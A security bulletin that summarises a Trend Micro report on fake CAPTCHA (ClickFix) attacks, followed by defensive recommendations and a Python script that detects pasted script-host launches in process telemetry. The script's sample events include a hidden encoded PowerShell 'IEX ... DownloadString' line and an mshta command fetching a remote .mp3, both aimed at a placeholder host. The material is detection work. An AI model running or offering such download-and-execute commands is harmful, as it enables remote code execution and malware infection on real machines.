Fake CAPTCHA Attacks Deploy Infostealers and RATs in a Multistage Payload Chain

Summary:
Trend Micro has observed a significant wave of fake CAPTCHA cases during its MDR investigations over the past few months. These attacks use a range of initial access methods, including phishing emails with embedded malicious links or PDFs, malvertising, and SEO poisoning, to redirect users to deceptive CAPTCHA pages. Their defining characteristic is the ClickFix-style "verification step": victims are instructed to copy a command and paste it into the Windows Run dialog. That command launches heavily obfuscated scripts, typically through the Microsoft HTML Application host (mshta) or base64-encoded PowerShell, which run several encoded stages entirely in memory to evade file-based detection. A distinctive delivery technique in this wave is the hosting of specially crafted .mp3 files on attacker-controlled sites; the files contain injected, heavily obfuscated JavaScript, and mshta executes that script regardless of the file extension. The script starts a multistage chain that ends with the download and execution of several malware families, including Lumma Stealer, Emmenhtal, Rhadamanthys, AsyncRAT, and XWorm. The campaigns abuse multiple legitimate platforms, including file-sharing services, content and search platforms, music repositories, URL redirectors, and document hosts. The resulting impact is severe: data exfiltration, credential theft, remote access, and persistent backdoor loaders. Organizations running Windows environments with lenient script execution policies are particularly exposed.

Security Officer Comments:
The surge in fake CAPTCHA attacks employing novel techniques, such as embedding malicious JavaScript in .mp3 files, highlights the evolving sophistication of ClickFix campaigns. The attackers' reliance on social engineering, which manufactures urgency and exploits trust in familiar platforms and legitimate domains, underscores the need for stronger user awareness training. Their abuse of built-in Windows utilities such as mshta and PowerShell for in-memory execution is a deliberate attempt to evade file-based detection; the paste-and-run step is also the clearest detection opportunity, because it appears in telemetry as explorer.exe spawning a script interpreter with an encoded or URL-bearing command line. The deployment of a diverse range of malware, from multiple information stealers to remote access trojans, points to a multifaceted objective that likely combines financial gain with long-term persistence. The use of SEO poisoning on compromised legitimate websites further emphasizes the need for EDR coverage and proactive threat hunting. Organizations must implement layered defenses, including disabling features they do not need such as the Run dialog (a PowerShell console or the File Explorer address bar accepts the same pasted command, so this restriction is one layer rather than a complete fix) and following the Principle of Least Privilege (PoLP), to mitigate the risk from these evolving and evasive campaigns. Attackers are likely to experiment with other file formats and delivery methods, such as disguised or shortened links sent through social media or messaging apps, which necessitates an adaptive security posture.

Suggested Corrections:
IOCs are available in the Trend Micro report listed under Link(s) below.

Trend Micro’s Recommendations for Defending Against These Attacks:
  • Disable access to the Run dialog (Win + R). This is advisable in environments where restricting user access to administrative tools and script execution is a priority. This reduces the risk of executing malicious PowerShell or MSHTA commands and limits the misuse of native Windows utilities.
  • Apply the principle of least privilege. Apart from restricting the Run dialog, ensure that users are granted only the permissions required for their tasks. This includes restricting write or execute access to sensitive directories, disabling script execution where not needed, and preventing elevation to admin privileges without approval workflows. Reducing privilege levels limits the ability of users (and malware) to execute system-altering commands.
  • Restrict access to unapproved tools and file-sharing platforms. Maintain a baseline of approved software and block access to public file-sharing services if not required for business use. Controlling access helps reduce the risk of unauthorized downloads and limits the attacker’s ability to deliver or load additional components.
  • Monitor for unusual clipboard and process behavior. As these attacks demonstrated, users can be socially engineered into pasting and executing malicious commands from the clipboard. Monitoring abnormal clipboard activity, such as encoded commands or suspicious script fragments, can provide early warning signs. It’s also important to track process behavior, particularly in environments where users interact with web content, PDFs, or messaging apps. Watch for abuse patterns, such as media players or browsers spawning unexpected executables or script interpreters, which could indicate payload delivery.
  • Harden browser configurations. Configure browsers to reduce exposure to SEO poisoning, malvertising, and script-based threats. This includes restricting JavaScript execution on untrusted or unknown domains, enabling filters to block malicious ad networks, disabling autoplay and mixed content to reduce risk from embedded scripts, and removing unnecessary browser plugins or extensions, especially those with elevated permissions or outdated components.
  • Enable memory protection features. There are built-in OS-level controls in Windows environments that can be enabled to detect in-memory execution, reflective DLL injection, and other evasive techniques. These protections help defend against multistage, fileless payloads that bypass traditional file-based detection.
  • Invest in user education. Training users to recognize suspicious links or phishing emails significantly reduces the risk of compromise. Awareness around safe browsing — even on production networks — is critical, as threats like the fake CAPTCHA attacks exploit user trust and social engineering tactics.
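The process-behavior check described in the monitoring recommendation above, implemented as an added example (this is not code from Trend Micro or from the original write-up): it scans Sysmon-style process-creation records for a script host launched by an interactive parent such as explorer.exe (the Run dialog's parent), decodes any -EncodedCommand blob to expose the hidden command, and flags remote fetches, including the .mp3 hosting trick from the summary. The sample events, host names, paths and script text are constructed for illustration; the parent and script-host lists are a starting set, not a complete one.

```python
"""Flag ClickFix-style executions in process-creation telemetry.

Added example, not Trend Micro's code. Event records are constructed to
resemble Sysmon Event ID 1 fields; URLs, paths and script text are invented.
"""
import base64
import ntpath
import re

# Script hosts a pasted Run-dialog one-liner typically launches.
SCRIPT_HOSTS = {"mshta.exe", "powershell.exe", "pwsh.exe", "cmd.exe",
                "wscript.exe", "cscript.exe"}

# Parents that mean "a human clicked or pasted": the shell (Win+R runs
# through explorer.exe), browsers, PDF readers, media players. Not exhaustive.
INTERACTIVE_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe",
                       "firefox.exe", "acrord32.exe", "wmplayer.exe", "vlc.exe"}

# -e / -ec / -en / -enc / -encodedcommand followed by a base64 blob.
# PowerShell accepts any unambiguous prefix; this covers the common ones
# and deliberately does not match -ep / -ExecutionPolicy.
ENC_RE = re.compile(r"(?i)(?:^|\s)-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})")
URL_RE = re.compile(r"(?i)\b(?:https?|ftp)://\S+")


def encode_powershell(script: str) -> str:
    """Produce the -EncodedCommand form: base64 over UTF-16LE text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(blob: str):
    """Reverse encode_powershell; return None if the blob is not valid."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_event(ev: dict):
    """Return a finding dict for a suspicious event, or None."""
    image = ntpath.basename(ev["image"]).lower()
    parent = ntpath.basename(ev["parent"]).lower()
    if image not in SCRIPT_HOSTS:
        return None
    reasons = []
    if parent in INTERACTIVE_PARENTS:
        reasons.append(f"{image} spawned by interactive parent {parent}")
    enc = ENC_RE.search(ev["cmdline"])
    decoded = decode_encoded_command(enc.group(1)) if enc else None
    if enc:
        reasons.append("encoded PowerShell command line")
    # Look for a remote fetch in the visible command line and, if we could
    # decode it, in the hidden command as well.
    haystack = ev["cmdline"] + (" " + decoded if decoded else "")
    url = URL_RE.search(haystack)
    if url:
        reasons.append("remote content fetched: " + url.group(0).rstrip("'\")"))
    if not reasons:
        return None
    # Interactive parent plus obfuscation or a remote fetch is the ClickFix
    # signature; an interactive parent alone is still worth a look.
    severity = "high" if parent in INTERACTIVE_PARENTS and (enc or url) else "medium"
    return {"image": image, "parent": parent, "severity": severity,
            "reasons": reasons, "decoded": decoded}


def analyze_events(events):
    return [f for f in (analyze_event(e) for e in events) if f]


# Constructed sample telemetry (not real data from the investigation).
HIDDEN = "IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/a/track.mp3')"
SAMPLE_EVENTS = [
    # pasted Run-dialog one-liner: mshta pulling a "media" file
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta https://example.invalid/a/track.mp3"},
    # pasted Run-dialog one-liner: hidden, encoded PowerShell
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -w hidden -NoP -ep bypass -enc " + encode_powershell(HIDDEN)},
    # browser launching mshta on a downloaded file
    {"parent": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe C:\Users\u\Downloads\verify.hta"},
    # benign user activity
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe notes.txt"},
    # benign admin script from a scheduled task
    {"parent": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1"},
]

if __name__ == "__main__":
    for f in analyze_events(SAMPLE_EVENTS):
        print(f["severity"].upper(), f["image"], "<-", f["parent"], "|", "; ".join(f["reasons"]))
        if f["decoded"]:
            print("    decoded:", f["decoded"])
```

Running the script prints three findings for the sample: the two Run-dialog launches as high severity (the second with the decoded download command) and the browser-spawned mshta as medium, while the notepad and scheduled-task events pass. In production, feed it Sysmon Event ID 1 or EDR process events carrying the same three fields. During triage, also collect HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU from the affected user profile: the Run dialog records the pasted command there even after the process has exited.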
Link(s):
https://www.trendmicro.com/en_us/research/25/e/unmasking-fake-captcha-cases.html